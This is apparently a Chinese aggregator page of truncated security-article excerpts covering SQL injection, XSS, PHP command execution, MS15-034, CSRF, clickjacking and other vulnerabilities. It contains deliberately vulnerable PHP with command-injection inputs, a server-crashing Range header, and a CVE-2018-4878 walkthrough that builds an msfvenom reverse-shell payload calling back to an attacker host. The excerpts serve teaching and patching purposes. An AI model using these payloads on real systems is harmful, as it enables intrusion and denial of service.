漏洞

常见安全漏洞

匿名 (未验证) 提交于 2019-12-03 00:37:01
1、SQL注入 许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,(一般是在浏览器地址栏进行,通过正常的www端口访问)根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection ,即SQL注入。 其主要危害有:在未经授权状况下操作数据库中的数据;恶意篡改网页内容;私自添加系统帐号或者是数据库使用者帐号;网页挂木马等。 SQL注入被广泛用于非法入侵网站服务器,获取网站控制权。它是应用层上的一种安全漏洞。通常在设计存在缺陷的程序中,对用户输入的数据没有做好过滤,导致恶意用户可以构造一些SQL语句让服务器去执行,从而导致数据库中的数据被窃取,篡改,删除,以及进一步导致服务器被入侵等危害。 2 、XSS XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 其主要危害有:攻击者通常会在有漏洞的程序中插入 JavaScript、VBScript、ActiveX或Flash以欺骗用户。一旦得手,他们可以盗取用户帐户,修改用户设置,盗取/污染cookie,做虚假广告等。 发生在客户端DOM(Document Object

任意命令执行漏洞简介

匿名 (未验证) 提交于 2019-12-03 00:34:01
命令成因 脚本语言有点事简洁,方便,但也伴随一些问题,比如运行速度慢,无法接触系统底层,如果我们开发的应用(特别是企业级的一些应用)需要除去web的特殊功能时,就需要调用一些外部程序。在应用需要去调用外部程序去处理的情况下,就会用到一些执行系统命令的函数。如php中的system,exec,shell_exec等,当用户可以控制命令执行的函数时,可以恶意注入系统命令到正常命令中,造成命令执行 在PHP中可以调用外部程序的主要有以下函数 1.system 2.exec 3.shell_exec 4.passthru 5.popen 6.proc_popen 命令执行漏洞的利用 1.system()函数的示例一、可控点为待执行程序 源代码: <?php $arg=$_GET['cmd']; if($arg) { system("$arg"); } ?> 直接在可控点输入命令即可 例: ?cmd=id ?cmd=pwd ?cmd=ifconfig 1.system()函数的示例一二、可控点是传入程序的整个参数 <?php $arg=$_GET['cmd']; if($arg) { system("ping -c 3 $arg"); } ?> 可控电视程序的整个参数,我们可以用管道命令来执行其他命令例如&& 或者| 例: 127.0.0.1 && phpinfo() system(

MS15-034测试方法

匿名 (未验证) 提交于 2019-12-03 00:32:02
Range: bytes=0-18446744073709551615 使用 IIS 作为 WEB 容器且使用版本存在编号为 MS-15034 的远程代码执行漏洞。利用该漏洞可轻易使服务器宕机蓝屏。发送测试代码,若返回“ ”证明存在此漏洞。 关于IIS远程代码执行漏洞 针对该漏洞,建议根据官网升级对应漏洞版本补丁。 文章来源: MS15-034测试方法

网站漏洞修复之CSRF跨站攻击

匿名 (未验证) 提交于 2019-12-03 00:26:01
在近几年的 网站安全威胁排列中排前三,跨站攻击利用的是网站的用户在登陆的状 态下,在用户不知不觉的 情况下执行恶意代码以及执行网站的权限操作,CSRF窃取 不了用户的数据,只能执行用户能操 作的一些数据。比如:在用户不知道的情况下 , 把账户里的金额,以及银行卡号,体现功能,都 转移到其他人账户里去。如果 被攻击者是一个管理员的权限,那么就会对网站安全构成严重的 危害。 CSRF跨站漏洞 由于网站设计人员,对CSRF跨站漏洞不是太了解,误认为用户从浏览器发送过来的 请求,当做 正常的用户请求,当受害者点击入侵者构造的恶意链接的时候就会执行 恶意的代码,以及恶意的 操作,例如删除用户的银行卡。Sine安全公司是一家专注 于:服务器安全、 网站安全 、网站安全 检测、网站漏洞修复,渗透测试,安全服务于 一体的网络安全服务提供商。 GET http://sinesafe.com/bank/delbank.php?id=66 当正常用户点击上面的连接的时候,并且该用户的登陆状态一直存在,用户就会不 知不觉的删除 了自己账户里的银行卡,给用户造成没必要的损失,说实话,简单的 用户身份验证以及过滤判断, 只能保证用户的请求是来自浏览器,却不能判断请求 本身是用户自己操作删除的银行卡。 CSRF网站跨站漏洞修复办法 CSRF漏洞基本都是在网站代码的框架中去修复该漏洞,我们在对网站安全进行测试

Tomcat 点击劫持漏洞修改

匿名 (未验证) 提交于 2019-12-03 00:22:01
修改 tomcat 的点击劫持漏洞 修改web服务器配置,添加X-Frame-Options响应头。赋值有如下三种: 1、DENY:不能被嵌入到任何iframe或者frame中 2、SAMEORIGIN:页面只能被本站页面嵌入到iframe或者frame中 3、ALLOW-FROM Uri:只能被嵌入到指定域名的框架中 < filter > < filter -name>httpHeaderSecurity</ filter -name> < filter -class>org.apache.catalina.filters.HttpHeaderSecurityFilter</ filter -class> <init- param > < param -name>antiClickJackingEnabled</ param -name> < param - value > true </ param - value > </init- param > <init- param > < param -name>antiClickJackingOption</ param -name> < param - value >SAMEORIGIN</ param - value > </init- param > <async-supported> true </async

heap 漏洞 unlink

匿名 (未验证) 提交于 2019-12-03 00:22:01
看了好久没看懂、、、一知半解,把链接放这里,慢慢看 内存管理机制 https://jaq.alibaba.com/community/art/show?spm=a313e.7916648.0.0.680125d6KB9x2z&articleid=334 漏洞利用 http://manyface.github.io/2016/05/19/AndroidHeapUnlinkExploitPractice/ https://www.baidu.com/link?url=2aRHVueUSpIgMp2baqdYXx1KDmRyoxJiMwmTKSnIIiV6j9Wmc1Devh1-trl9vGAB0fcHLPSkSofJGuFLHsh_s_&wd=&eqid=c788168a0001b2c0000000055b160ff5 https://github.com/shellphish/how2heap https://www.tuicool.com/articles/E3Ezu2u 结合起来看,感觉稍微懂了点。。。 再去看youtube上面那个LiveOverflow的heap视频,感觉就差不多了 文章来源: heap 漏洞 unlink

cve-2018-4878漏洞复现

匿名 (未验证) 提交于 2019-12-03 00:22:01
靶机:Windows7 sp1 条件: kali:192.168.43.16 (需要输入的命令均用<>标记出来,<>不需要输入) 准备工作: kali中打开终端,找到下载的cve-2018-4878工具,切换到该路径(这种工具在未来应该尽量由自己写出来) <msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.16 LPORT=4444 -f python>shellcode.txt> 生成shellcode.txt可以查看kali的shellcode <cat shellcode.txt>查看shellcode,并替换cve-2018-4878里面原来的shellcode 打开cve-2018-4878.py,并根据图中指示修改 好了,改完之后在cve-2018-4878(下载的工具文件夹路径中) <python cve-2018-4878.py>生成要用的exploit.swf和index.html <ls>发现已经生成了exploit.swf和index.html两个文件 现在,我们要开启apache2服务,把两个文件复制到apache web路径中 <service apache2 start> <cp index.html /var/www/html/index.html> <cp exploit.swf

SSH版本信息可被获取漏洞解决方法

匿名 (未验证) 提交于 2019-12-03 00:22:01
redhat 企业版 6.1 用漏洞扫描软件扫出:SSH版本信息可被获取漏洞,建议解决方法为* 修改源代码或者配置文件改变SSH服务的缺省banner 这解决方法太粗糙了,网上搜了一下,在论坛里面还真找到了解决方法。 修改SSH登录时的Banner信息 1、编辑一个文件,输入想要显示的内容: #vi /etc/ssh_banner_change 2、修改SSH配置文件中的banner文件路径 #vi /etc/ssh/sshd_config 找到 修改为 Banner /etc/ssh_banner_change 3、重启一下sshd进程即可。 文章来源: SSH版本信息可被获取漏洞解决方法

Backdoors in D-Link’s backyard

匿名 (未验证) 提交于 2019-12-03 00:22:01
D-Link DIR-620路由器存在多个漏洞 By Denis Makrushin 2018/5/23/10:00 “如果你想改变世界,就从自己开始吧。”在安全研究的情况下,这可以改写为:“如果你想让世界变得更加安全,那么就从家中的智能事物开始。”或者, 更具体的说,从您的路由器开始 - 任何家庭网络的核心以及一个有趣的研究对象。 而从互联网服务提供商那里获得的路由器作为您的互联网合同的一部分,在研究方面则更加有趣。 注意:以下有关漏洞的信息已提交给相关利益相关方(D-Link,ISP提供商,Mitre),我们将根据漏洞披露政策发布此信息。 以下建议介绍了D-Link DIR-620固件中的四个漏洞和硬编码帐户。 该固件在俄罗斯最大的ISP之一提供给客户的各种D-Link路由器上运行(此结论基于路由器作为标准客户合同的一部分提供的事实,硬编码凭证包含 ISP在登录字符串中)。 这可能就是为什么这种特定型号的路由器在俄罗斯和独联体国家非常流行(大多数家庭路由器位于ISP的NAT后面,这就是为什么这些路由器没有出现在统计数据中)。 图1.弱势路由器的地理位置 最新版本的固件对默认凭证进行了硬编码,未经身份验证的攻击者可利用该凭证获取对固件的特权访问权限,并提取敏感数据(例如,使用纯文本密码的配置文件)。

开源Web服务器GoAhead漏洞CVE-2017-17562分析

匿名 (未验证) 提交于 2019-12-03 00:21:02
一.简介 二.影响版本 三.漏洞成因 四.漏洞利用 五.参考 https://www.exploit-db.com/exploits/43360/ https://github.com/elttam/advisories/tree/master/CVE-2017-17562 转载请标明出处: 开源Web服务器GoAhead漏洞CVE-2017-17562分析 文章来源: 开源Web服务器GoAhead漏洞CVE-2017-17562分析